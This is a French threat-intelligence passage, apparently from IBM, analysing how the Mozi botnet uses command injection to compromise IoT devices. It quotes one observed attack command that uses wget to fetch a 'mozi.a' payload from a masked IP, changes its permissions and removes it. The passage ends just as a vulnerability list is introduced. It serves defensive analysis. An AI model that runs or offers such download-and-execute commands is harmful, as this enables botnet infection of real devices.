Presque toutes les attaques IdO observées par IBM ont tenté d'utiliser des attaques CMDi pour obtenir un accès initial à l'appareil. Si le point de terminaison ciblé était un appareil IdO et est vulnérable à ces attaques, la charge utile a été téléchargée et exécutée.

Les attaques CMDi sont extrêmement populaires contre les appareils IdO pour plusieurs raisons. Tout d’abord, les systèmes intégrés IdO contiennent généralement une interface Web et une interface de débogage laissées par le développement de microprogrammes qui peuvent être exploitées. Deuxièmement, les modules PHP intégrés dans les interfaces web de l'IdO peuvent être exploités pour donner à des acteurs malveillants une capacité d'exécution à distance. Et troisièmement, les interfaces IdO sont souvent vulnérables lorsqu’elles sont déployées, car les administrateurs ne parviennent pas à durcir les interfaces en nettoyant l'entrée attendue. Cela permet aux acteurs de la menace d'entrée des commandes shell telles que « wget ».

Notre analyse a révélé que le botnet Mozi tire parti de CMDi en utilisant une commande shell « wget », puis en modifiant les autorisations pour permettre à l'acteur de la menace d'interagir avec le système concerné. En voici quelques exemples :

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a ; chmod 777 /var/tmp/mozi.a ; rm -rf /var/tmp/mozi.a

Si l’hôte était vulnérable à CMDi, cette commande téléchargeait et exécutait un fichier appelé « mozi.a ». Notre analyse de cet échantillon particulier indique que le fichier s'exécute sur un microprocesseur sans étages pipelinés interverrouillés (MIPS). Il s’agit d’une extension comprise par les machines exécutant une architecture d’ordinateur à ensemble d’instructions réduit (RISC), qui est répandue sur de nombreux appareils IdO. Une fois que l’attaquant obtient un accès complet à l’appareil via le botnet, le niveau du firmware peut être modifié et des logiciels malveillants supplémentaires peuvent être implantés sur l’appareil.

Bien que cet exemple cite un vecteur bien connu, il peut continuer à être efficace pour deux raisons principales. Premièrement, les nouvelles vulnérabilités permettent une mise à jour constante des tentatives d'exploitation via CMDi, et la lenteur de la mise en œuvre des correctifs peut être exploitée. Deuxièmement, cette activité est facilement automatisable, ce qui permet aux acteurs de la menace de cibler rapidement et à moindre coût un large éventail d’appareils.

L'infrastructure du botnet Mozi semble provenir principalement de Chine, représentant 84 % de l'infrastructure observée. Ce fait concorde avec d'autres recherches open source sur l'activité de l'IdO en 2020.

Vous trouverez ci-dessous une liste des vulnérabilités qu'IBM a observé que le botnet Mozi tentait d'exploiter :